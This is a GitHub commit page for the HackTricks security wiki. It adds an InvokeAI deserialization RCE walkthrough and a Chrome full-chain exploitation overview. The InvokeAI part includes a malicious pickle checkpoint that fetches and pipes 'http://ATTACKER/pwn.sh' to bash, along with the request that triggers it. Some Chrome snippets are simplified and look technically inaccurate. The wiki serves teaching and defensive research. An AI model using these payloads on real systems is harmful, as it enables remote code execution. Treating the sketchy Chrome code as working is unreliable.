Skip to content

Commit 551871d

Browse files
committed
Merge branch 'master' of github.com:HackTricks-wiki/hacktricks
2 parents ef441b6 + e525e8f commit 551871d

16 files changed

Lines changed: 1030 additions & 42 deletions

File tree

searchindex.js

Lines changed: 1 addition & 1 deletion
Large diffs are not rendered by default.

src/AI/AI-Models-RCE.md

Lines changed: 86 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -23,10 +23,86 @@ At the time of the writting these are some examples of this type of vulneravilit
2323
| **Keras (older formats)** | *(No new CVE)* Legacy Keras H5 model | Malicious HDF5 (`.h5`) model with Lambda layer code still executes on load (Keras safe_mode doesn’t cover old format – “downgrade attack”) | |
2424
| **Others** (general) | *Design flaw* – Pickle serialization | Many ML tools (e.g., pickle-based model formats, Python `pickle.load`) will execute arbitrary code embedded in model files unless mitigated | |
2525

26-
2726
Moreover, there some python pickle based models like the ones used by [PyTorch](https://github.com/pytorch/pytorch/security) that can be used to execute arbitrary code on the system if they are not loaded with `weights_only=True`. So, any pickle based model might be specially susceptible to this type of attacks, even if they are not listed in the table above.
2827

29-
Example:
28+
### 🆕 InvokeAI RCE via `torch.load` (CVE-2024-12029)
29+
30+
`InvokeAI` is a popular open-source web interface for Stable-Diffusion. Versions **5.3.1 – 5.4.2** expose the REST endpoint `/api/v2/models/install` that lets users download and load models from arbitrary URLs.
31+
32+
Internally the endpoint eventually calls:
33+
34+
```python
35+
checkpoint = torch.load(path, map_location=torch.device("meta"))
36+
```
37+
38+
When the supplied file is a **PyTorch checkpoint (`*.ckpt`)**, `torch.load` performs a **pickle deserialization**. Because the content comes directly from the user-controlled URL, an attacker can embed a malicious object with a custom `__reduce__` method inside the checkpoint; the method is executed **during deserialization**, leading to **remote code execution (RCE)** on the InvokeAI server.
39+
40+
The vulnerability was assigned **CVE-2024-12029** (CVSS 9.8, EPSS 61.17 %).
41+
42+
#### Exploitation walk-through
43+
44+
1. Create a malicious checkpoint:
45+
46+
```python
47+
# payload_gen.py
48+
import pickle, torch, os
49+
50+
class Payload:
51+
def __reduce__(self):
52+
return (os.system, ("/bin/bash -c 'curl http://ATTACKER/pwn.sh|bash'",))
53+
54+
with open("payload.ckpt", "wb") as f:
55+
pickle.dump(Payload(), f)
56+
```
57+
58+
2. Host `payload.ckpt` on an HTTP server you control (e.g. `http://ATTACKER/payload.ckpt`).
59+
3. Trigger the vulnerable endpoint (no authentication required):
60+
61+
```python
62+
import requests
63+
64+
requests.post(
65+
"http://TARGET:9090/api/v2/models/install",
66+
params={
67+
"source": "http://ATTACKER/payload.ckpt", # remote model URL
68+
"inplace": "true", # write inside models dir
69+
# the dangerous default is scan=false → no AV scan
70+
},
71+
json={}, # body can be empty
72+
timeout=5,
73+
)
74+
```
75+
76+
4. When InvokeAI downloads the file it calls `torch.load()` → the `os.system` gadget runs and the attacker gains code execution in the context of the InvokeAI process.
77+
78+
Ready-made exploit: **Metasploit** module `exploit/linux/http/invokeai_rce_cve_2024_12029` automates the whole flow.
79+
80+
#### Conditions
81+
82+
• InvokeAI 5.3.1-5.4.2 (scan flag default **false**)
83+
`/api/v2/models/install` reachable by the attacker
84+
• Process has permissions to execute shell commands
85+
86+
#### Mitigations
87+
88+
* Upgrade to **InvokeAI ≥ 5.4.3** – the patch sets `scan=True` by default and performs malware scanning before deserialization.
89+
* When loading checkpoints programmatically use `torch.load(file, weights_only=True)` or the new [`torch.load_safe`](https://pytorch.org/docs/stable/serialization.html#security) helper.
90+
* Enforce allow-lists / signatures for model sources and run the service with least-privilege.
91+
92+
> ⚠️ Remember that **any** Python pickle-based format (including many `.pt`, `.pkl`, `.ckpt`, `.pth` files) is inherently unsafe to deserialize from untrusted sources.
93+
94+
---
95+
96+
Example of an ad-hoc mitigation if you must keep older InvokeAI versions running behind a reverse proxy:
97+
98+
```nginx
99+
location /api/v2/models/install {
100+
deny all; # block direct Internet access
101+
allow 10.0.0.0/8; # only internal CI network can call it
102+
}
103+
```
104+
105+
## Example – crafting a malicious PyTorch model
30106

31107
- Create the model:
32108

@@ -67,7 +143,6 @@ model.load_state_dict(torch.load("malicious_state.pth", weights_only=False))
67143
# /tmp/pwned.txt is created even if you get an error
68144
```
69145

70-
71146
## Models to Path Traversal
72147

73148
As commented in [**this blog post**](https://blog.huntr.com/pivoting-archive-slip-bugs-into-high-value-ai/ml-bounties), most models formats used by different AI frameworks are based on archives, usually `.zip`. Therefore, it might be possible to abuse these formats to perform path traversal attacks, allowing to read arbitrary files from the system where the model is loaded.
@@ -102,4 +177,11 @@ with tarfile.open("symlink_demo.model", "w:gz") as tf:
102177
tf.add(PAYLOAD) # rides the symlink
103178
```
104179

105-
{{#include ../banners/hacktricks-training.md}}
180+
## References
181+
182+
- [OffSec blog – "CVE-2024-12029 – InvokeAI Deserialization of Untrusted Data"](https://www.offsec.com/blog/cve-2024-12029/)
183+
- [InvokeAI patch commit 756008d](https://github.com/invoke-ai/invokeai/commit/756008dc5899081c5aa51e5bd8f24c1b3975a59e)
184+
- [Rapid7 Metasploit module documentation](https://www.rapid7.com/db/modules/exploit/linux/http/invokeai_rce_cve_2024_12029/)
185+
- [PyTorch – security considerations for torch.load](https://pytorch.org/docs/stable/notes/serialization.html#security)
186+
187+
{{#include ../banners/hacktricks-training.md}}

src/SUMMARY.md

Lines changed: 4 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -283,6 +283,7 @@
283283
- [Privileged Groups](windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md)
284284
- [RDP Sessions Abuse](windows-hardening/active-directory-methodology/rdp-sessions-abuse.md)
285285
- [Resource-based Constrained Delegation](windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md)
286+
- [Sccm Management Point Relay Sql Policy Secrets](windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md)
286287
- [Security Descriptors](windows-hardening/active-directory-methodology/security-descriptors.md)
287288
- [SID-History Injection](windows-hardening/active-directory-methodology/sid-history-injection.md)
288289
- [Silver Ticket](windows-hardening/active-directory-methodology/silver-ticket.md)
@@ -334,6 +335,7 @@
334335
- [Frida Tutorial 3](mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md)
335336
- [Objection Tutorial](mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md)
336337
- [Google CTF 2018 - Shall We Play a Game?](mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md)
338+
- [Insecure In App Update Rce](mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md)
337339
- [Install Burp Certificate](mobile-pentesting/android-app-pentesting/install-burp-certificate.md)
338340
- [Intent Injection](mobile-pentesting/android-app-pentesting/intent-injection.md)
339341
- [Make APK Accept CA Certificate](mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md)
@@ -347,6 +349,7 @@
347349
- [Webview Attacks](mobile-pentesting/android-app-pentesting/webview-attacks.md)
348350
- [iOS Pentesting Checklist](mobile-pentesting/ios-pentesting-checklist.md)
349351
- [iOS Pentesting](mobile-pentesting/ios-pentesting/README.md)
352+
- [Air Keyboard Remote Input Injection](mobile-pentesting/ios-pentesting/air-keyboard-remote-input-injection.md)
350353
- [iOS App Extensions](mobile-pentesting/ios-pentesting/ios-app-extensions.md)
351354
- [iOS Basics](mobile-pentesting/ios-pentesting/ios-basics.md)
352355
- [iOS Basic Testing Operations](mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md)
@@ -759,6 +762,7 @@
759762
- [SROP - Sigreturn-Oriented Programming](binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md)
760763
- [SROP - ARM64](binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md)
761764
- [Array Indexing](binary-exploitation/array-indexing.md)
765+
- [Chrome Exploiting](binary-exploitation/chrome-exploiting.md)
762766
- [Integer Overflow](binary-exploitation/integer-overflow.md)
763767
- [Format Strings](binary-exploitation/format-strings/README.md)
764768
- [Format Strings - Arbitrary Read Example](binary-exploitation/format-strings/format-strings-arbitrary-read-example.md)
Lines changed: 184 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,184 @@
1+
# Chrome Exploiting
2+
3+
{{#include ../banners/hacktricks-training.md}}
4+
5+
> This page provides a high-level yet **practical** overview of a modern "full-chain" exploitation workflow against Google Chrome 130 based on the research series **“101 Chrome Exploitation”** (Part-0 — Preface).
6+
> The goal is to give pentesters and exploit-developers the minimum background necessary to reproduce or adapt the techniques for their own research.
7+
8+
## 1. Chrome Architecture Recap
9+
Understanding the attack surface requires knowing where code is executed and which sandboxes apply.
10+
11+
```
12+
+-------------------------------------------------------------------------+
13+
| Chrome Browser |
14+
| |
15+
| +----------------------------+ +-----------------------------+ |
16+
| | Renderer Process | | Browser/main Process | |
17+
| | [No direct OS access] | | [OS access] | |
18+
| | +----------------------+ | | | |
19+
| | | V8 Sandbox | | | | |
20+
| | | [JavaScript / Wasm] | | | | |
21+
| | +----------------------+ | | | |
22+
| +----------------------------+ +-----------------------------+ |
23+
| | IPC/Mojo | |
24+
| V | |
25+
| +----------------------------+ | |
26+
| | GPU Process | | |
27+
| | [Restricted OS access] | | |
28+
| +----------------------------+ | |
29+
+-------------------------------------------------------------------------+
30+
```
31+
32+
Layered defence-in-depth:
33+
34+
* **V8 sandbox** (Isolate): memory permissions are restricted to prevent arbitrary read/write from JITed JS / Wasm.
35+
* **Renderer ↔ Browser split** ensured via **Mojo/IPC** message passing; the renderer has *no* native FS/network access.
36+
* **OS sandboxes** further contain each process (Windows Integrity Levels / `seccomp-bpf` / macOS sandbox profiles).
37+
38+
A *remote* attacker therefore needs **three** successive primitives:
39+
40+
1. Memory corruption inside V8 to get **arbitrary RW inside the V8 heap**.
41+
2. A second bug allowing the attacker to **escape the V8 sandbox to full renderer memory**.
42+
3. A final sandbox-escape (often logic rather than memory corruption) to execute code **outside of the Chrome OS sandbox**.
43+
44+
---
45+
46+
## 2. Stage 1 – WebAssembly Type-Confusion (CVE-2025-0291)
47+
48+
A flaw in TurboFan’s **Turboshaft** optimisation mis-classifies **WasmGC reference types** when the value is produced and consumed inside a *single basic block loop*.
49+
50+
Effect:
51+
* The compiler **skips the type-check**, treating a *reference* (`externref/anyref`) as an *int64*.
52+
* Crafted Wasm allows overlapping a JS object header with attacker-controlled data → <code>addrOf()</code> & <code>fakeObj()</code> **AAW / AAR primitives**.
53+
54+
Minimal PoC (excerpt):
55+
56+
```WebAssembly
57+
(module
58+
(type $t0 (func (param externref) (result externref)))
59+
(func $f (param $p externref) (result externref)
60+
(local $l externref)
61+
block $exit
62+
loop $loop
63+
local.get $p ;; value with real ref-type
64+
;; compiler incorrectly re-uses it as int64 in the same block
65+
br_if $exit ;; exit condition keeps us single-block
66+
br $loop
67+
end
68+
end)
69+
(export "f" (func $f)))
70+
```
71+
72+
Trigger optimisation & spray objects from JS:
73+
74+
```js
75+
const wasmMod = new WebAssembly.Module(bytes);
76+
const wasmInst = new WebAssembly.Instance(wasmMod);
77+
const f = wasmInst.exports.f;
78+
79+
for (let i = 0; i < 1e5; ++i) f({}); // warm-up for JIT
80+
81+
// primitives
82+
let victim = {m: 13.37};
83+
let fake = arbitrary_data_backed_typedarray;
84+
let addrVict = addrOf(victim);
85+
```
86+
87+
Outcome: **arbitrary read/write within V8**.
88+
89+
---
90+
91+
## 3. Stage 2 – Escaping the V8 Sandbox (issue 379140430)
92+
93+
When a Wasm function is tier-up-compiled, a **JS ↔ Wasm wrapper** is generated. A signature-mismatch bug causes the wrapper to write past the end of a trusted **`Tuple2`** object when the Wasm function is re-optimised *while still on the stack*.
94+
95+
Overwriting the 2 × 64-bit fields of the `Tuple2` object yields **read/write on any address inside the Renderer process**, effectively bypassing the V8 sandbox.
96+
97+
Key steps in exploit:
98+
1. Get function into **Tier-Up** state by alternating turbofan/baseline code.
99+
2. Trigger tier-up while keeping a reference on the stack (`Function.prototype.apply`).
100+
3. Use Stage-1 AAR/AAW to find & corrupt the adjacent `Tuple2`.
101+
102+
Wrapper identification:
103+
104+
```js
105+
function wrapperGen(arg) {
106+
return f(arg);
107+
}
108+
%WasmTierUpFunction(f); // force tier-up (internals-only flag)
109+
wrapperGen(0x1337n);
110+
```
111+
112+
After corruption we possess a fully-featured **renderer R/W primitive**.
113+
114+
---
115+
116+
## 4. Stage 3 – Renderer → OS Sandbox Escape (CVE-2024-11114)
117+
118+
The **Mojo** IPC interface `blink.mojom.DragService.startDragging()` can be called from the Renderer with *partially trusted* parameters. By crafting a `DragData` structure pointing to an **arbitrary file path** the renderer convinces the browser to perform a *native* drag-and-drop **outside the renderer sandbox**.
119+
120+
Abusing this we can programmatically “drag” a malicious EXE (previously dropped in a world-writable location) onto the Desktop, where Windows automatically executes certain file-types once dropped.
121+
122+
Example (simplified):
123+
124+
```js
125+
const payloadPath = "C:\\Users\\Public\\explorer.exe";
126+
127+
chrome.webview.postMessage({
128+
type: "DragStart",
129+
data: {
130+
title: "MyFile",
131+
file_path: payloadPath,
132+
mime_type: "application/x-msdownload"
133+
}
134+
});
135+
```
136+
137+
No additional memory corruption is necessary – the **logic flaw** gives us arbitrary file execution with the user’s privileges.
138+
139+
---
140+
141+
## 5. Full Chain Flow
142+
143+
1. **User visits** malicious webpage.
144+
2. **Stage 1**: Wasm module abuses CVE-2025-0291 → V8 heap AAR/AAW.
145+
3. **Stage 2**: Wrapper mismatch corrupts `Tuple2` → escape V8 sandbox.
146+
4. **Stage 3**: `startDragging()` IPC → escape OS sandbox & execute payload.
147+
148+
Result: **Remote Code Execution (RCE)** on the host (Chrome 130, Windows/Linux/macOS).
149+
150+
---
151+
152+
## 6. Lab & Debugging Setup
153+
154+
```bash
155+
# Spin-up local HTTP server w/ PoCs
156+
npm i -g http-server
157+
git clone https://github.com/Petitoto/chromium-exploit-dev
158+
cd chromium-exploit-dev
159+
http-server -p 8000 -c -1
160+
161+
# Windows kernel debugging
162+
"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\windbgx.exe" -symbolpath srv*C:\symbols*https://msdl.microsoft.com/download/symbols
163+
```
164+
165+
Useful flags when launching a *development* build of Chrome:
166+
167+
```bash
168+
chrome.exe --no-sandbox --disable-gpu --single-process --js-flags="--allow-natives-syntax"
169+
```
170+
171+
---
172+
173+
## Takeaways
174+
175+
* **WebAssembly JIT bugs** remain a reliable entry-point – the type system is still young.
176+
* Obtaining a second memory-corruption bug inside V8 (e.g. wrapper mismatch) greatly simplifies **V8-sandbox escape**.
177+
* Logic-level weaknesses in privileged Mojo IPC interfaces are often sufficient for a **final sandbox escape** – keep an eye on *non-memory* bugs.
178+
179+
180+
181+
## References
182+
* [101 Chrome Exploitation — Part 0 (Preface)](https://opzero.ru/en/press/101-chrome-exploitation-part-0-preface/)
183+
* [Chromium security architecture](https://chromium.org/developers/design-documents/security)
184+
{{#include ../banners/hacktricks-training.md}}

0 commit comments

Comments
 (0)